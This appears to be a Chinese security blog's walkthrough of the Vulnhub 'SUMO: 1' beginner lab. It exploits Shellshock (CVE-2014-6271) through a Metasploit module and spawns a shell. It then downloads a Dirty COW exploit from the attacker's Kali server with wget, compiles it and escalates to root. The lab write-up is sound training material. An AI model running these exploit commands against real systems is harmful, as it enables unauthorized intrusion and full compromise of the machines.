Vulnhub-SUMO: 1

大家好，我们是想要为亿人提供安全的亿人安全，这是我们自己想要做的事情，也是做这个公众号的初衷。希望以干货的方式，让大家多多了解这个行业，从中学到对自己有用的知识。

靶机描述：

Target Address：http://www.vulnhub.com/entry/sumo-1,480/

Difficulty: Beginner(新手)

Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

Operating System: Linux

扫描靶机ip为192.168.86.152

arp-scan -l

版本侦测和查看开放端口

nmap -sV -p- 192.168.86.152

进入浏览器访问80端口，提示此为服务器默认页面

http://192.168.86.152:80

执行nikto命令，OSVDB-112004似乎存在漏洞

nikto -h http://192.168.86.152

用浏览器查看提示页面，找出漏洞id名CVE-2014-6271

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)

使用msfconsole，搜索攻击方式

msfconsolesearch CVE-2014-6271

选择攻击方式，进行攻击设置

use exploit/multi/http/apache_mod_cgi_bash_env_execset rhosts 192.168.86.152set targeturi /cgi-bin/testrun

反弹shell，变为交互式tty，查看文件属性

shellpython -c'import pty;pty.spawn('/bin/bash')'

使用脏牛提权，而脏牛提权漏洞影响>=2.4.22版本，执行命令查看内核版本

下载脏牛漏洞脚本，文件名为dirtycowscan.sh

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

kali开启http服务

python -m SimpleHTTPServer 8000 

远程访问kali并下载脚本文件，扫描并发现存在脏牛漏洞

把链接中的代码在kali中编辑成.c的格式

https://www.exploit-db.com/raw/40839

在shell中下载dirty.c的文件，修改文件权限，进行编译(方法在脚本的注释行中)

wget http://192.168.86.138:8000/dirty.cchmod 777gcc -pthread dirty.c -o dirty -lcrypt

运行脚本，输入密码的地方可以随意设置

./dirty testpasswd

使用firefart用户登录，使用刚刚设置的密码，获得root权限，拿到flag

本文始发于微信公众号（亿人安全）：Vulnhub-SUMO: 1